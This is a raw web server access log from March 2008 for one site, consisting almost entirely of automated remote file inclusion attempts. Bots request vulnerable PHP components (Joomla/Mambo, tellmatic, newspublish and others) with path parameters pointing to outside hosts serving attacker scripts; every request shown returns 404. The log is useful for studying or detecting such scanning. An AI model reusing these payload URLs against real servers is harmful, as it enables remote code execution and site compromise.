89.248.96.141 - - [04/Mar/2008:06:03:13 -0800] "GET /logs/access_080131.log//templates/mangobery/footer.sample.php?Site_Path=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:06:03:25 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:06:03:26 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:06:03:26 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.107 - - [04/Mar/2008:06:03:50 -0800] "GET /logs/access.log HTTP/1.0" 200 126403 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:06:03:57 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:06:03:58 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.139.130 - - [04/Mar/2008:06:04:06 -0800] "GET /logs/access_080216.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:06:04:07 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:04:17 -0800] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:04:17 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:04:17 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.29.0.28 - - [04/Mar/2008:06:04:19 -0800] "GET /logs/access.log/tools/send_reminders.php?noSet=0&includedir=http://bmcbeth.com/data/tmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.112 - - [04/Mar/2008:06:04:40 -0800] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.112 - - [04/Mar/2008:06:04:40 -0800] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.adelix-server.co.uk/mantis/images/green1.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.112 - - [04/Mar/2008:06:04:40 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.112 - - [04/Mar/2008:06:04:40 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.adelix-server.co.uk/mantis/images/green1.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.112 - - [04/Mar/2008:06:04:40 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.134.252.112 - - [04/Mar/2008:06:04:40 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.adelix-server.co.uk/mantis/images/green1.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:06:04:48 -0800] "GET /logs/access_080208.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
212.227.60.6 - - [04/Mar/2008:06:04:48 -0800] "GET /logs/access_080131.log%20%20//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://rafb.net/p/imSXet81.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:06:04:55 -0800] "GET /index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:06:05:05 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
193.138.206.219 - - [04/Mar/2008:06:05:14 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.kcsm.nl/images/stories/fruit/fruit/idmic2.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:06:05:32 -0800] "GET /logs/access_080126.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:06:05:32 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.9.78.190 - - [04/Mar/2008:06:05:32 -0800] "GET /logs/access_080215.log/admin/business_inc/saveserver.php?thisdir=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:06:05:36 -0800] "GET /logs/access_080126.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:06:05:37 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.13.126 - - [04/Mar/2008:06:05:37 -0800] "GET /logs/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.133.244.69 - - [04/Mar/2008:06:05:42 -0800] "GET /logs/access_080223.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.81.213.24 - - [04/Mar/2008:06:05:59 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.fansvictorvaldes.es//images/data/alba.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.221 - - [04/Mar/2008:06:06:02 -0800] "GET /logs/access_071211.log HTTP/1.0" 200 128565 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:06:06:07 -0800] "GET /logs/access_080216.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:06:06:24 -0800] "GET /logs/access_080126.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:06:06:24 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:06:06:25 -0800] "GET /logs/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:06:06:26 -0800] "GET /logs/access_080126.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:06:06:26 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:06:06:27 -0800] "GET /logs/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:06:06:47 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:06:06:47 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:06:06:54 -0800] "GET /administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.118.102.153 - - [04/Mar/2008:06:06:55 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:06:06:55 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.30.169.80 - - [04/Mar/2008:06:06:56 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:06:06:59 -0800] "GET /logs/access_080120.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:06:07:05 -0800] "GET /logs/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:06:07:33 -0800] "GET /logs/access_080101.log/index.php?option=com_invite&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:07:53 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:07:53 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:07:54 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:07:54 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:07:54 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:07:54 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:07:55 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:07:55 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:07:55 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:07:56 -0800] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:08:39 -0800] "GET /logs/access.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:08:39 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:08:39 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
209.172.35.235 - - [04/Mar/2008:06:08:49 -0800] "GET /logs/access_080216.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:08:51 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:09:07 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:09:16 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:09:23 -0800] "GET /logs/access_080215.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:09:23 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:09:23 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:06:10:20 -0800] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:06:10:21 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:06:10:24 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:06:10:41 -0800] "GET /newspublish/samplenewspublish.php?path[docroot]=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:06:10:44 -0800] "GET /index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:12:05 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:12:05 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:12:07 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:12:16 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:12:16 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:12:16 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:12:16 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:12:16 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:12:17 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:06:12:26 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:06:12:26 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:12:27 -0800] "GET /logs/access.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:12:27 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:12:27 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.72.215.178 - - [04/Mar/2008:06:12:35 -0800] "GET /logs/access_080216.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.133.173 - - [04/Mar/2008:06:12:37 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:12:57 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:12:57 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:12:57 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:12:57 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:12:57 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:12:57 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.85.39.114 - - [04/Mar/2008:06:13:23 -0800] "GET /logs/access_080106.log/admin.php?include_path=http://a.x.apescar.net/memex.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.39.114 - - [04/Mar/2008:06:13:23 -0800] "GET /admin.php?include_path=http://a.x.apescar.net/memex.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.39.114 - - [04/Mar/2008:06:13:23 -0800] "GET /logs/admin.php?include_path=http://a.x.apescar.net/memex.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:06:13:25 -0800] "GET /logs/access_080107.log/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:06:13:25 -0800] "GET /logs/index.php?option=com_apf_bridge&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.39.114 - - [04/Mar/2008:06:13:28 -0800] "GET /logs/access_080216.log/admin.php?include_path=http://a.x.apescar.net/memex.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.21.152.2 - - [04/Mar/2008:06:13:34 -0800] "GET /tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.241.32.144 - - [04/Mar/2008:06:13:35 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.60" "www.dmulk.com"
208.101.37.19 - - [04/Mar/2008:06:13:38 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:13:45 -0800] "GET /logs/access_080215.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:13:45 -0800] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.48 - - [04/Mar/2008:06:13:45 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.81.28 - - [04/Mar/2008:06:14:00 -0800] "GET /logs/access_080215.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:14:16 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.19.204 - - [04/Mar/2008:06:14:16 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.hollywoodgolfclub.org/.../arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
